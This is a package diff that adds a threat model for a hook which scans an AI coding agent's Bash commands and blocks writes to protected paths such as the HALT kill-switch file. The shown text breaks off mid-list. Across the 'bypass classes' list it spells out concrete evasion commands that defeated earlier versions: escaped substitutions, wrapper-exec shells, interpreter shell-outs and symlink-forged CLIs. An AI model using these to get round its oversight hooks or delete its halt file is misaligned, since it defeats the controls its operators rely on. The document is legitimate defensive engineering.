@bookedsolid/rea 0.22.0 → 0.23.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +15 -0
- package/THREAT_MODEL.md +753 -0
- package/dist/audit/append.js +1 -1
- package/dist/cli/doctor.js +11 -12
- package/dist/cli/hook.d.ts +37 -3
- package/dist/cli/hook.js +167 -5
- package/dist/cli/init.js +14 -26
- package/dist/cli/install/canonical.js +18 -3
- package/dist/cli/install/commit-msg.js +1 -2
- package/dist/cli/install/copy.js +4 -13
- package/dist/cli/install/fs-safe.js +5 -16
- package/dist/cli/install/gitignore.js +1 -5
- package/dist/cli/install/pre-push.js +3 -8
- package/dist/cli/install/settings-merge.js +79 -16
- package/dist/cli/upgrade.js +14 -10
- package/dist/gateway/downstream.js +1 -2
- package/dist/gateway/live-state.js +3 -1
- package/dist/gateway/log.js +1 -3
- package/dist/gateway/middleware/audit.js +1 -1
- package/dist/gateway/middleware/injection.js +3 -9
- package/dist/gateway/middleware/policy.js +3 -1
- package/dist/gateway/middleware/redact.js +1 -1
- package/dist/gateway/observability/codex-telemetry.js +1 -2
- package/dist/gateway/reviewers/claude-self.js +10 -6
- package/dist/hooks/bash-scanner/blocked-scan.d.ts +26 -0
- package/dist/hooks/bash-scanner/blocked-scan.js +467 -0
- package/dist/hooks/bash-scanner/index.d.ts +41 -0
- package/dist/hooks/bash-scanner/index.js +62 -0
- package/dist/hooks/bash-scanner/parse-fail-closed.d.ts +31 -0
- package/dist/hooks/bash-scanner/parse-fail-closed.js +27 -0
- package/dist/hooks/bash-scanner/parser.d.ts +42 -0
- package/dist/hooks/bash-scanner/parser.js +92 -0
- package/dist/hooks/bash-scanner/protected-scan.d.ts +76 -0
- package/dist/hooks/bash-scanner/protected-scan.js +868 -0
- package/dist/hooks/bash-scanner/verdict.d.ts +80 -0
- package/dist/hooks/bash-scanner/verdict.js +49 -0
- package/dist/hooks/bash-scanner/walker.d.ts +165 -0
- package/dist/hooks/bash-scanner/walker.js +9087 -0
- package/dist/hooks/push-gate/base.js +2 -6
- package/dist/hooks/push-gate/codex-runner.js +3 -1
- package/dist/hooks/push-gate/index.js +9 -10
- package/dist/policy/loader.js +4 -1
- package/dist/registry/tofu-gate.js +2 -2
- package/hooks/blocked-paths-bash-gate.sh +142 -272
- package/hooks/protected-paths-bash-gate.sh +227 -511
- package/package.json +3 -2
- package/profiles/bst-internal-no-codex.yaml +1 -1
- package/profiles/bst-internal.yaml +1 -1
- package/profiles/client-engagement.yaml +1 -1
- package/profiles/lit-wc.yaml +1 -1
- package/profiles/minimal.yaml +1 -1
- package/profiles/open-source-no-codex.yaml +1 -1
- package/profiles/open-source.yaml +1 -1
- package/scripts/postinstall.mjs +1 -2
- package/scripts/run-vitest.mjs +117 -0
package/THREAT_MODEL.md
CHANGED
|
@@ -524,3 +524,756 @@ REA operates two independent layers. Bypassing one does not disable the other.
|
|
|
524
524
|
**Gateway layer** (runtime, `rea serve`): A middleware chain processes every proxied MCP tool call. Middleware enforces: audit, kill switch, policy/autonomy level, tier classification, blocked paths, rate limit, circuit breaker, prompt-injection classification (§5.21), secret redaction (pre and post), and result size cap. The gateway also supervises downstream child processes (§5.14), emits a `SESSION_BLOCKER` audit event on persistent failure (§5.15), and publishes a live per-downstream state snapshot to `.rea/serve.state.json` (§5.16) that `rea status` reads read-only. The `__rea__health` meta-tool short-circuits the chain for callability under HALT and runs a dedicated sanitizer on its response (§5.17).
|
|
525
525
|
|
|
526
526
|
Both layers fail closed: on read failure, parse error, unknown errno on HALT, regex timeout, or any unexpected condition, the default action is deny (or for redaction specifically: replace with a sentinel — the content never escapes unscanned).
|
|
527
|
+
|
|
528
|
+
---
|
|
529
|
+
|
|
530
|
+
## 8. Bash-tier scanner (parser-backed, 0.23.0+)
|
|
531
|
+
|
|
532
|
+
Two of the shipped hooks — `protected-paths-bash-gate.sh` and
|
|
533
|
+
`blocked-paths-bash-gate.sh` — are thin shims that forward stdin to
|
|
534
|
+
the `rea hook scan-bash` CLI subcommand. The CLI parses the Bash
|
|
535
|
+
command via `mvdan-sh@0.10.1`, walks the AST in
|
|
536
|
+
`src/hooks/bash-scanner/walker.ts`, and applies per-utility detectors
|
|
537
|
+
that produce a `DetectedWrite[]`. The scanner then matches each
|
|
538
|
+
detection's path against the protected-paths or blocked_paths policy
|
|
539
|
+
and emits a verdict JSON. The shim re-verifies the verdict shape via
|
|
540
|
+
`node -e` before honoring the exit code (defense against a tampered
|
|
541
|
+
`REA_NODE_CLI` that returns exit 0 with empty stdout).
|
|
542
|
+
|
|
543
|
+
### 8.1 Trust assumptions
|
|
544
|
+
|
|
545
|
+
The scanner trusts the following components. Each row names what we
|
|
546
|
+
trust, what would happen if the trust were violated, and what pins
|
|
547
|
+
the trust.
|
|
548
|
+
|
|
549
|
+
| Component | What we trust | If violated | Pinned by |
|
|
550
|
+
| ---------------------------------- | -------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------- | -------------------------------------------------------------------------------------- |
|
|
551
|
+
| `mvdan-sh@0.10.1` | Produces a faithful AST from any input bash accepts | Detector misses target on mis-shaped node | Pinned version, RedirOperator op-code snapshot tests, Class O exhaustiveness contract |
|
|
552
|
+
| Walker dispatch table | Enumerates every shape that produces a write | Novel utility silently allowed | Per-PR corpus fixture requirement; 18 corpus classes; convergence ladder |
|
|
553
|
+
| `fs.lstatSync` / `fs.readlinkSync` | Identify symlinks including dangling links | Symlink-out bypass class reopens | Codex round 1 F-2 closure + symlink corpus |
|
|
554
|
+
| `node` on PATH in the shim | Verdict-JSON verifier runs | Shim refuses on uncertainty (fail-closed) | Shim test for missing-node branch |
|
|
555
|
+
| Project-root realpath | `realpath(cli).startsWith(realpath(CLAUDE_PROJECT_DIR))` defends symlink-out | Forged CLI path inside `node_modules` defeats CLI-resolver | Codex round 5 F2 closure + corpus |
|
|
556
|
+
| OS realpath semantics | `node:fs.realpathSync` resolves symlinks consistently with the kernel; macOS `/var` ↔ `/private/var` aliasing handled via the rea_resolved_relative_form helper | Path-traversal escape | helix-021 closure + corpus |
|
|
557
|
+
| `@bookedsolid/rea` package install | `node_modules/@bookedsolid/rea/package.json#name === "@bookedsolid/rea"` AND realpath stays in project | Supply-chain compromise — see §8.3 | npm provenance; opt-in `policy.review.cli_sha256` (deferred to future minor) |
|
|
558
|
+
|
|
559
|
+
The scanner does NOT trust:
|
|
560
|
+
|
|
561
|
+
- The Bash command string itself — every input is parsed with a
|
|
562
|
+
hostile-input-tolerant parser and walked with a deny-by-default
|
|
563
|
+
visitor.
|
|
564
|
+
- `REA_NODE_CLI` / any environment variable nominating the CLI path
|
|
565
|
+
(codex round 1 F-3 + round 2 R2-3 — env-var hijack class dropped).
|
|
566
|
+
- The CLI exit code alone — the shim re-parses verdict JSON via
|
|
567
|
+
`node -e` and cross-checks exit code matches verdict (round 1 F-3).
|
|
568
|
+
- The visitor's per-`Cmd`-kind enumeration — replaced with `syntax.Walk`
|
|
569
|
+
in round-6 (round 6 closure: walker-dispatch field-omission is
|
|
570
|
+
structurally impossible).
|
|
571
|
+
- mvdan-sh's `syntax.Walk` to visit every Word-bearing field — Class O
|
|
572
|
+
contract test pins reach (round-7 closure).
|
|
573
|
+
- `unshellEscape` to handle every DQ-escape sequence — bash spec
|
|
574
|
+
enumerated and pinned by Class P corpus (round-8 closure).
|
|
575
|
+
|
|
576
|
+
### 8.2 Bypass classes structurally impossible
|
|
577
|
+
|
|
578
|
+
- **walker dispatch field-omission is structurally impossible**, and
|
|
579
|
+
**mvdan-sh `syntax.Walk` field gaps are pinned by a contract test**
|
|
580
|
+
(0.23.0 round-6 + round-7 layered closure).
|
|
581
|
+
|
|
582
|
+
Round 6 — our own dispatch. Pre-refactor `walkForWrites` dispatched
|
|
583
|
+
on AST `Cmd` kinds via an explicit `case` ladder
|
|
584
|
+
(`case 'WhileClause':`, `case 'ForClause':`, …) and manually
|
|
585
|
+
enumerated which fields each kind traversed. Any field NOT
|
|
586
|
+
enumerated in a case branch was silently dropped — that pattern
|
|
587
|
+
produced six rounds of P0 bypasses (rounds 1-5 patched detection
|
|
588
|
+
gaps; round 6 closed the structural class). Round 6 found two P0s
|
|
589
|
+
in the same class as round 5 (`WhileClause.Cond`,
|
|
590
|
+
`ForClause.CStyleLoop.{Init,Cond,Post}`) and the convergence ladder
|
|
591
|
+
34→14→9→8→5→2 demonstrated the walker would never reach 0 with
|
|
592
|
+
patches alone — it was structurally a denylist over AST shapes.
|
|
593
|
+
The new walker uses `mvdan-sh`'s built-in `syntax.Walk(node, visit)`
|
|
594
|
+
which traverses every Cmd-kind dispatch exhaustively from OUR side.
|
|
595
|
+
Our dispatch is preserved (per-utility cp/mv/sed/find/etc.), but the
|
|
596
|
+
TRAVERSAL is no longer a denylist of OUR shapes. A new `Cmd` type
|
|
597
|
+
added to mvdan-sh, or a new field on an existing type, reaches OUR
|
|
598
|
+
dispatcher when Walk descends into its inner Stmts / CallExprs /
|
|
599
|
+
BinaryCmds.
|
|
600
|
+
|
|
601
|
+
Round 7 — Walk's own field gaps. Codex round 7 (P0) flagged that
|
|
602
|
+
the round-6 framing "Walk visits every field" was overclaim:
|
|
603
|
+
mvdan-sh@0.10.1's `syntax.Walk` itself has empirically-verified
|
|
604
|
+
field gaps. Specifically, `ParamExp.Slice.Offset` and
|
|
605
|
+
`ParamExp.Slice.Length` (Word nodes that can hold CmdSubst payloads)
|
|
606
|
+
are NOT visited. Pre-fix this defeated 17 round-7 PoCs including
|
|
607
|
+
`${X:$(rm)}`, `${X:0:$(rm)}`, `${arr[@]:$(rm)}`, `${@:$(rm)}` —
|
|
608
|
+
every paramexp-slice form bypassed every detector. That made
|
|
609
|
+
0.23.0 a regression vs 0.22.0 (whose bash regex caught
|
|
610
|
+
`${X:$(rm)}` directly). Round-7 closure layers on round-6:
|
|
611
|
+
|
|
612
|
+
1. Tactical fix: `walkForWrites` declares its visitor up front and
|
|
613
|
+
manually re-enters `syntax.Walk` on `ParamExp.Slice.Offset` /
|
|
614
|
+
`Slice.Length` whenever the visitor sees a ParamExp. The
|
|
615
|
+
re-entry uses the SAME visitor, so nested ParamExp.Slice forms
|
|
616
|
+
(e.g. `${X:${Y:$(rm)}}`) recurse correctly.
|
|
617
|
+
2. Structural pin: the **Class O exhaustiveness contract test**
|
|
618
|
+
(`__tests__/hooks/bash-scanner/walker-exhaustiveness.contract.test.ts`)
|
|
619
|
+
enumerates every named (node-type, field) Word-bearing position
|
|
620
|
+
mvdan-sh's parser populates and asserts the walker reaches each
|
|
621
|
+
one. If mvdan-sh@0.11.0+ adds a new node-with-Word-field that
|
|
622
|
+
Walk skips, the contract fails CI before runtime. The fix in
|
|
623
|
+
that case is always a one-line manual recursion in the visit
|
|
624
|
+
callback (same pattern as `recurseParamExpSlice`).
|
|
625
|
+
|
|
626
|
+
Combined: walker-dispatch field-omission bugs in OUR code are
|
|
627
|
+
structurally impossible (Walk-based traversal). Walk's own field
|
|
628
|
+
gaps are pinned by Class O. New mvdan-sh versions cannot silently
|
|
629
|
+
introduce new bypass classes — they fail the contract first.
|
|
630
|
+
- segment-splitter mis-detection (helix-014/015/016) — there is no
|
|
631
|
+
segmenter to bypass.
|
|
632
|
+
- shell-redirect ordering vs argv ordering ambiguity — the parser
|
|
633
|
+
attaches `Redirs` to the right `Stmt`, including FuncDecl Body
|
|
634
|
+
Stmts (codex round 1 F-1).
|
|
635
|
+
- nested-shell payload bypass (helix-017 #2 / helix-022 #3) —
|
|
636
|
+
`bash -c PAYLOAD` re-parses the payload up to a depth cap of 8.
|
|
637
|
+
- `find -exec bash -c` re-wrap (codex round 1 F-4) — inner argv
|
|
638
|
+
routes through `detectNestedShell` for re-parse.
|
|
639
|
+
- combined flag-cluster bypass (`bash -ic`, `node -pe`, `perl -E`,
|
|
640
|
+
codex round 1 F-13/F-8) — the eval-flag scanner accepts any
|
|
641
|
+
short-flag cluster containing the eval char.
|
|
642
|
+
- backslash-escape bypass (codex round 1 F-15) — normalize strips
|
|
643
|
+
bash's runtime backslash collapse.
|
|
644
|
+
- dangling-symlink bypass (codex round 1 F-2) — `lstat`+`readlink`
|
|
645
|
+
resolves the link manually.
|
|
646
|
+
- REA_NODE_CLI hijack (codex round 1 F-3, codex round 2 R2-3) — env
|
|
647
|
+
var dropped entirely. The 4-tier resolver was further narrowed in
|
|
648
|
+
codex round 4 Finding 2: tiers 1 (`command -v rea` PATH lookup) and
|
|
649
|
+
2 (`node_modules/.bin/rea` symlink) were DROPPED because both are
|
|
650
|
+
workspace-attacker-controllable. The shim now uses a 2-tier sandboxed
|
|
651
|
+
resolver (`node_modules/@bookedsolid/rea/dist/cli/index.js` or
|
|
652
|
+
`dist/cli/index.js`). Workspace-bin attacker hijack via fake `rea`
|
|
653
|
+
binary at `node_modules/.bin/rea` is closed. The structural-impossibility
|
|
654
|
+
claim is bounded — see §8.3 for the supply-chain residual.
|
|
655
|
+
- symlink-out-of-project sandbox bypass (codex round 5 F2 — P0) — pre-fix
|
|
656
|
+
the realpath check only walked up looking for a `package.json` with
|
|
657
|
+
`name === "@bookedsolid/rea"`. An attacker who could write a symlink
|
|
658
|
+
at `node_modules/@bookedsolid/rea` pointing to `/tmp/sym-attacker/`
|
|
659
|
+
containing a forged `package.json` + a forged `dist/cli/index.js` that
|
|
660
|
+
exits 0 with `{"verdict":"allow"}` defeated the sandbox. Fix: PRIMARY
|
|
661
|
+
check is `realpath(cli).startsWith(realpath(CLAUDE_PROJECT_DIR) + sep)`;
|
|
662
|
+
any escape-out-of-project realpath refuses. The pkg.json walk-up
|
|
663
|
+
remains as the SECONDARY check guarding intra-project hijacks.
|
|
664
|
+
- assignment-side cmdsubst silent bypass (codex round 5 F1 — P0) —
|
|
665
|
+
`FOO=$(rm -rf .rea)`, `X=\`rm -rf .rea\``, `export FOO=$(rm)`,
|
|
666
|
+
`readonly X=$(rm)`, `local`/`declare`/`typeset`, `ARR=( $(rm) )`,
|
|
667
|
+
`[[ -n $(rm) ]]`, `case $(rm) in *) ;; esac`, `cat <<< $(rm)`,
|
|
668
|
+
`read X < <(rm)`, `(( $(rm | wc -l) ))`, `for x in $(rm)`. Pre-fix the
|
|
669
|
+
walker short-circuited at `args.length === 0` and ignored
|
|
670
|
+
`CallExpr.Assigns`; the AST cases `DeclClause`, `TestClause`,
|
|
671
|
+
`ArithmCmd`, `LetClause`, `SelectClause` and `CaseClause.Word` were
|
|
672
|
+
dropped at the walkCmd default. Stmt.Redirs's Word also wasn't walked
|
|
673
|
+
for embedded CmdSubst on read ops (here-string `<<<` 0x3f, procsubst-
|
|
674
|
+
on-stdin `< <(...)` 0x38). Fix: new `walkAssignsForSubstNodes` walks
|
|
675
|
+
every Assign.Value / Assign.Array.Elems[*].Value / Assign.Index for
|
|
676
|
+
embedded CmdSubst/ProcSubst/ArithmExp; new `walkTestExpr` recurses
|
|
677
|
+
through UnaryTest/BinaryTest/ParenTest leaves; walkCmd cases added for
|
|
678
|
+
every dropped clause type; extractStmtRedirects walks the Word for
|
|
679
|
+
cmdsubst regardless of operator.
|
|
680
|
+
- mixed-quote interpreter shell-out (codex round 5 F3 — P1) — pre-fix
|
|
681
|
+
the per-language `*_SHELL_OUT_RE` patterns used `["']([^"']+)["']` for
|
|
682
|
+
the inner-cmd capture, which truncated bodies whose source contained
|
|
683
|
+
the alternate quote (e.g. `os.system('rm "x"')` captured `rm `). Fix:
|
|
684
|
+
quote-aware variants `(["'])((?:(?!\1)[^\\]|\\.)+)\1` for python /
|
|
685
|
+
ruby / node / perl, plus a fail-closed shell-out fallback that emits a
|
|
686
|
+
dynamic detection when the payload contains a shell-out API token but
|
|
687
|
+
no shell-out regex extracted a clean payload.
|
|
688
|
+
- chained-interpreter multi-level escape bypass (codex round 5 F4 — P1)
|
|
689
|
+
— pre-fix `python -c "import os; os.system('node -e \"require(\\\"fs
|
|
690
|
+
\\\").rmSync(\\\".rea\\\", ...)\"')"` allowed because each layer
|
|
691
|
+
accumulates a `\\\"` shell-escape level and the per-language path-
|
|
692
|
+
quote regex rejects `(\\"` after the call paren. Fix: when a shell-
|
|
693
|
+
out body itself contains a known interpreter binary head followed by
|
|
694
|
+
an eval flag (`-c`/`-e`/`--eval`/`-pe`/`-ic`), emit a dynamic
|
|
695
|
+
detection (`looksLikeChainedInterpreter`). Refuse on uncertainty.
|
|
696
|
+
- non-string `tool_input.command` (codex round 1 F-31) — refused at
|
|
697
|
+
CLI input parse.
|
|
698
|
+
- absolute / relative-path command head (codex round 2 R2-14) —
|
|
699
|
+
basename-normalized before dispatcher switch; `/usr/bin/bash`,
|
|
700
|
+
`./sed`, `/usr/bin/env bash` all dispatch identically to the
|
|
701
|
+
bare-name form.
|
|
702
|
+
- decoupled-variable interpreter writes (codex round 2 R2-1) —
|
|
703
|
+
flat-scan over the payload: write API + any string-construction
|
|
704
|
+
primitive → dynamic detection.
|
|
705
|
+
- symlink cycles / deep chains (codex round 2 R2-2) — visited-set +
|
|
706
|
+
depth cap (32); cycle/cap returns sentinel that maps to "refuse on
|
|
707
|
+
uncertainty".
|
|
708
|
+
- joined `-t<DIR>` form (codex round 2 R2-4) — cp/mv/install/ln all
|
|
709
|
+
recognize the no-space form.
|
|
710
|
+
- tar `-C DIR`, rsync DEST, curl `-o`, wget `-O`, shred FILE,
|
|
711
|
+
eval payload, git checkout/restore/reset path (codex round 2 R2-7
|
|
712
|
+
through R2-13) — each utility now has a dedicated dispatcher.
|
|
713
|
+
- heredoc-into-shell (codex round 2 R2-12) — `bash <<EOF\n…\nEOF`
|
|
714
|
+
re-parses the heredoc body and walks the inner AST.
|
|
715
|
+
- eval re-parse (codex round 2 R2-13) — argv concat → re-parse →
|
|
716
|
+
walk; refuse on dynamic argv or parse failure.
|
|
717
|
+
- eval ordering with cmdsubst (codex round 3 Finding 1 — P0) —
|
|
718
|
+
`eval $(cmd)` no longer slips through the empty-inner short-circuit;
|
|
719
|
+
any-dynamic-argv emits a dynamic detection.
|
|
720
|
+
- pipe-into-bare-shell (codex round 3 Finding 2 — P1) — `cmd | bash`
|
|
721
|
+
with no `-c` is refuse-on-uncertainty.
|
|
722
|
+
- tar cluster `-xzfC` (codex round 3 Finding 3 — P1) — value-bearing
|
|
723
|
+
cluster chars consume subsequent argv tokens correctly.
|
|
724
|
+
- git top-level value-bearing flags (codex round 3 Finding 4 — P1) —
|
|
725
|
+
`-C`, `-c`, `--git-dir`, `--work-tree`, etc. are walked past before
|
|
726
|
+
identifying the subcommand.
|
|
727
|
+
- python shell-out shapes (codex round 3 Finding 5 — P1) —
|
|
728
|
+
`subprocess.* shell=True` and `subprocess.run(..., stdout=open())`
|
|
729
|
+
re-parse the inner shell.
|
|
730
|
+
- recursive directory delete bypass (codex round 4 Finding 1 — P0) —
|
|
731
|
+
`rm -rf .rea`, `rmdir .rea`, `find .rea -delete`, `shutil.rmtree(...)`,
|
|
732
|
+
`fs.rmSync(..., {recursive:true})`, `FileUtils.rm_rf(...)` etc. all
|
|
733
|
+
flag isDestructive on emit; the matcher's protected-ancestry path
|
|
734
|
+
treats writes against an ancestor directory as hits on every protected
|
|
735
|
+
pattern under it. Structurally closed: `PROTECTED_DIR_ANCESTORS` was
|
|
736
|
+
added to the corpus generator so the cross-product produces directory-
|
|
737
|
+
shaped destructive fixtures, eliminating the structural gap that
|
|
738
|
+
prevented detection.
|
|
739
|
+
- mv source-side bypass (codex round 4 Finding 3 — P1) — `mv` source
|
|
740
|
+
positionals are emitted as destructive writes too (mv removes content
|
|
741
|
+
at the source).
|
|
742
|
+
- find -delete unmodeled (codex round 4 Finding 4 — P1) — seed paths
|
|
743
|
+
are emitted as destructive write targets; with `-name PREDICATE`
|
|
744
|
+
present, the seed is emitted as dynamic+destructive (refuse on
|
|
745
|
+
uncertainty).
|
|
746
|
+
- interpreter shell-out breadth (codex round 4 Finding 5 — P1) — perl
|
|
747
|
+
exec/open-pipe, ruby Open3 / IO.popen, node spawn-with-bash-c, python
|
|
748
|
+
pty.spawn, opaque-spawn APIs (os.spawnv* / os.execv*) all detected
|
|
749
|
+
with re-parse-or-refuse.
|
|
750
|
+
- pathlib & File-class destructive APIs (codex round 4 Finding 6 — P1)
|
|
751
|
+
— Path(...).touch / .unlink / .rmdir / .rename, File.delete /
|
|
752
|
+
File.unlink / File.rename, ruby `open(F, 'w')` (bare), perl unlink /
|
|
753
|
+
rename all caught with isDestructive plumbed through where the API
|
|
754
|
+
semantic is removal.
|
|
755
|
+
- misc utility writes (codex round 4 Finding 7 — P1) — `patch`, `sort
|
|
756
|
+
-o`, `shuf -o`, `gpg --output`, `split <PREFIX>`, `trap "cmd" SIGNAL`
|
|
757
|
+
(re-parse trap command), `git config --file` all detected.
|
|
758
|
+
- procsubst-feeding-bash (codex round 4 Finding 7 — P1) — `bash <(cmd)`,
|
|
759
|
+
`bash 0< <(cmd)`, `bash <<< "cmd"` all emit dynamic detections; the
|
|
760
|
+
shell reads the FIFO/here-string as a script we cannot statically
|
|
761
|
+
resolve.
|
|
762
|
+
- nested-shell DQ-escape parity (codex round 8 P0) — `unshellEscape`
|
|
763
|
+
pre-fix collapsed only `\"` and `\'` from DQ payloads. Bash spec
|
|
764
|
+
collapses 5 DQ-significant escape sequences (`\$`, `` \` ``, `\"`,
|
|
765
|
+
`\\`, `\<newline>`). Pre-fix `bash -c "echo \"\$(rm .rea/HALT)\""`
|
|
766
|
+
was a verified end-to-end exploit: the real shell collapsed `\$` →
|
|
767
|
+
`$`, evaluated the CmdSubst, and deleted HALT, while the walker's
|
|
768
|
+
re-parse saw `\$` as a literal `$` (no CmdSubst child) and ALLOWED.
|
|
769
|
+
Fix: widened `unshellEscape`'s replace class to all five DQ-significant
|
|
770
|
+
escape characters. Class P corpus (≥560 fixtures across 5 shells × 16
|
|
771
|
+
DQ-escape shapes × 7 protected targets, plus 8 negatives) pins the
|
|
772
|
+
closure. Class O contract (round-7) was simultaneously tightened —
|
|
773
|
+
the lenient `|| w.dynamic` acceptance was replaced with opt-in
|
|
774
|
+
`acceptDynamic` per row, so contract-test passes can no longer mask
|
|
775
|
+
walker gaps via unrelated `nested_shell_inner` dynamic emits.
|
|
776
|
+
- wrapper-shell-exec class (codex round 9 F1 + round 10 P1) —
|
|
777
|
+
`<wrapper> <shell> -c PAYLOAD` shape where the wrapper transparently
|
|
778
|
+
forks/execs the next argv as the "real" command (`nice`, `timeout`,
|
|
779
|
+
`chronic`, `parallel`, `watch`, `dbus-launch`, ... and unbounded
|
|
780
|
+
future similar wrappers). Pre-round-9 `stripEnvAndModifiers` ignored
|
|
781
|
+
these wrappers, so the head-dispatch saw the wrapper name and missed
|
|
782
|
+
the inner `<shell> -c PAYLOAD`. Round 9 enumerated 21 wrappers; round
|
|
783
|
+
10 surfaced 5 more — clear evidence the enumeration approach was
|
|
784
|
+
unbounded. Round-10 closure is **structural**: a new
|
|
785
|
+
`detectWrappedNestedShell` pass runs in `walkCallExpr`'s `default:`
|
|
786
|
+
case (head not in dispatcher's allow-list) and detects the bypass
|
|
787
|
+
shape `<UNRECOGNIZED-HEAD> [...flags...] <KNOWN-SHELL> -c PAYLOAD`
|
|
788
|
+
REGARDLESS of wrapper identity. Synthesizes a `[shell, -c, PAYLOAD,
|
|
789
|
+
...]` slice and re-dispatches through `detectNestedShell`. False-
|
|
790
|
+
positive guards (a) skip when head is an introspection / output
|
|
791
|
+
utility (`echo`, `printf`, `man`, `which`, ...) and (b) skip when
|
|
792
|
+
argv[1] is itself an introspection head — covers
|
|
793
|
+
`<wrapper> echo bash` shapes. Three-token lookahead window between
|
|
794
|
+
shell positional and `-c` flag bounds false-positive risk. Bare-
|
|
795
|
+
shell-without-`-c` form refuses on uncertainty (stdin read).
|
|
796
|
+
Closes the bug class — every future unknown wrapper that
|
|
797
|
+
fork/execs a shell is caught without enumeration. Round 10 also
|
|
798
|
+
added explicit enumerations for `chronic`/`dbus-launch`/`watch`/
|
|
799
|
+
`script -c`/`parallel ::: ` for clean dispatch (no
|
|
800
|
+
refuse-on-uncertainty banner). Class S (233 wrapper-extension
|
|
801
|
+
positives + 38 negatives) and Class T (314 synthetic-wrapper
|
|
802
|
+
structural-guard positives + 29 false-positive-guard negatives)
|
|
803
|
+
pin the closure.
|
|
804
|
+
- find-exec placeholder, git history-rewrite seams, archive
|
|
805
|
+
extraction, parallel-stdin, more wrappers, php (codex round 11
|
|
806
|
+
F11-1..F11-7) — seven INDEPENDENT classes against the round-10
|
|
807
|
+
wrapper closure. None were variants of the wrapper family;
|
|
808
|
+
each landed in a different parser seam. (a) `find . -name HALT
|
|
809
|
+
-exec rm {} \;` — `{}` is a placeholder substituted at runtime
|
|
810
|
+
by find against the live filesystem; static analysis cannot
|
|
811
|
+
resolve which paths it expands to. Round-11 fix: synthetic
|
|
812
|
+
`find_exec_placeholder_unresolvable` dynamic detection emitted
|
|
813
|
+
whenever inner argv has `{}` AND the inner head is not in a
|
|
814
|
+
small read-only allow-list (`cat`, `grep`, `head`, `wc`, etc.).
|
|
815
|
+
(b) `git rm -f .rea/HALT` and `git mv .rea/HALT /tmp/x` were
|
|
816
|
+
not in the `TRACKED` subcommand set; round-11 added explicit
|
|
817
|
+
branches with `--cached` carve-out for `git rm`. (c) `git
|
|
818
|
+
filter-branch --tree-filter PAYLOAD` and `git rebase --exec`
|
|
819
|
+
/ `-x` / `git bisect run` / `git commit --template=PATH` were
|
|
820
|
+
re-parse seams where git feeds PAYLOAD through `/bin/sh -c` at
|
|
821
|
+
runtime; round-11 added per-subcommand handlers feeding PAYLOAD
|
|
822
|
+
through `recurseShellPayload` → `parseBashCommand` →
|
|
823
|
+
`walkForWrites` (full top-level walker re-dispatch). (d)
|
|
824
|
+
archive extraction: `tar -xf x.tar -C . .rea/HALT` extracts the
|
|
825
|
+
protected member; `tar -xzf x.tgz` (no `-C`, no member list)
|
|
826
|
+
extracts every member — archive may contain `.rea/HALT`.
|
|
827
|
+
Round-11 fix: `detectTar` extended with extract-mode positional
|
|
828
|
+
harvesting, plus new `detectUnzip`/`detect7z`/`detectGzip`/
|
|
829
|
+
`detectPax` dispatchers. `bsdtar` aliases to `tar`. When -x is
|
|
830
|
+
set with no `-C` AND no explicit members, emit
|
|
831
|
+
`archive_extract_unresolvable`. (e) `echo .rea/HALT | parallel
|
|
832
|
+
rm` reads input from stdin (no `:::`); round-11 added pre-strip
|
|
833
|
+
detection in `walkCallExpr` that emits
|
|
834
|
+
`parallel_stdin_unresolvable` when parallel head has positional
|
|
835
|
+
template tokens AND no `:::`/`::::`/`:::+`/`::::+` separator.
|
|
836
|
+
(f) `fakeroot`/`flock`/`gtimeout`/`unshare`/`env --chdir=`/
|
|
837
|
+
`sudo -s --` were not stripped by `stripEnvAndModifiers`;
|
|
838
|
+
round-11 added each wrapper with appropriate flag arity
|
|
839
|
+
handling, plus shell-mode `sudo -s --` synthesis to `sh -c
|
|
840
|
+
PAYLOAD`. (g) `php -r CODE` was missing from interpreter
|
|
841
|
+
dispatch; round-11 added `PHP_EVAL_FLAGS` (-r, --run) and
|
|
842
|
+
`PHP_WRITE_PATTERNS` covering `unlink`/`file_put_contents`/
|
|
843
|
+
`rename`/`copy`/`fopen` (write modes)/`mkdir`/`rmdir`/`touch`/
|
|
844
|
+
`chmod`/`chown`/`chgrp`/`symlink`/`link`/`move_uploaded_file`.
|
|
845
|
+
Class U (round-11 find/git/archive/parallel — 360 positives +
|
|
846
|
+
17 negatives) and Class V (round-11 wrappers + PHP — 124
|
|
847
|
+
positives + 8 negatives) pin the closure.
|
|
848
|
+
- adjacent-utility / cumulative-parity gaps (codex round 12
|
|
849
|
+
F12-1..F12-9 — nine INDEPENDENT findings against the round-11
|
|
850
|
+
surface). Not variants of any prior round; each landed in
|
|
851
|
+
PHP / archive-create / cmake / mkfifo+mknod / find-write-
|
|
852
|
+
predicate space where round-11 had not applied the cumulative
|
|
853
|
+
discipline established by earlier rounds. (a) F12-1 P0:
|
|
854
|
+
PHP `rename(SRC, DEST)` SOURCE-side blindspot — round-4 F3
|
|
855
|
+
established mv-shape source IS destructive; round-11 bundled
|
|
856
|
+
PHP rename with the destination-only group, so SRC slipped
|
|
857
|
+
past. Round-12 fix: split rename into TWO patterns + add
|
|
858
|
+
`rename(` to DESTRUCTIVE_API_TOKENS. (b) F12-2 P0: PHP
|
|
859
|
+
`rmdir(PATH)` not flagged destructive — bundled with mkdir/
|
|
860
|
+
touch (creates), so protected-ancestry never matched. Round-12
|
|
861
|
+
fix: split rmdir + add `rmdir(` to DESTRUCTIVE_API_TOKENS.
|
|
862
|
+
(c) F12-3 P0: PHP shell-out missing entirely —
|
|
863
|
+
`pickShellOutPatternsFor` had no php_r_path case. Round-12
|
|
864
|
+
fix: new PHP_SHELL_OUT_RE with quote-aware backref body
|
|
865
|
+
extraction covering system / exec / shell_exec / passthru /
|
|
866
|
+
popen / proc_open / backtick. (d) F12-4 P0: PHP -B/-E /
|
|
867
|
+
--process-begin / --process-end accept CODE same as -r;
|
|
868
|
+
round-11 PHP_EVAL_FLAGS only had -r/--run. Round-12 fix:
|
|
869
|
+
extend exactLong + shortChars (case-sensitive uppercase).
|
|
870
|
+
(e) F12-5 P0: archive CREATE direction missing — only EXTRACT
|
|
871
|
+
was checked. `tar -cf .rea/policy.yaml docs/`, `zip
|
|
872
|
+
.rea/policy.yaml docs/file`, `7z a .rea/policy.yaml docs/`
|
|
873
|
+
all silently overwrote the OUTPUT archive at the protected
|
|
874
|
+
path. Round-12 fix: detectTar gains isCreateOrAppend pass +
|
|
875
|
+
-f/-cf/--file emit; detect7z gains a/u/d compress branch;
|
|
876
|
+
